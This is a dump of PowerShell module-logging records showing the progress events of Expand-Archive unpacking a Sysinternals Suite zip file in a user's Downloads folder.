ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="281"
 
-RECORD 57----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 58----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="280"
 
-RECORD 59----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 60----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="279"
 
-RECORD 61----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 62----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="278"
 
-RECORD 63----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 64----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="277"
 
-RECORD 65----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 66----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="276"
 
-RECORD 67----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 68----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="275"
 
-RECORD 69----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 70----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="274"
 
-RECORD 71----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 72----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="273"
 
-RECORD 73----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 74----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="272"
 
-RECORD 75----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 76----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="271"
 
-RECORD 77----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 78----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="270"
 
-RECORD 79----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 80----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="269"
 
-RECORD 81----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 82----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="268"
 
-RECORD 83----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 84----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="267"
 
-RECORD 85----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 86----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="266"
 
-RECORD 87----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 88----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="265"
 
-RECORD 89----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 90----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="264"
 
-RECORD 91----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 92----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="263"
 
-RECORD 93----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 94----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="262"
 
-RECORD 95----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 96----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="261"
 
-RECORD 97----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 98----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="260"
 
-RECORD 99----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="84"
                                                                                                                                                                                                                                                                 
only showing top 100 rows

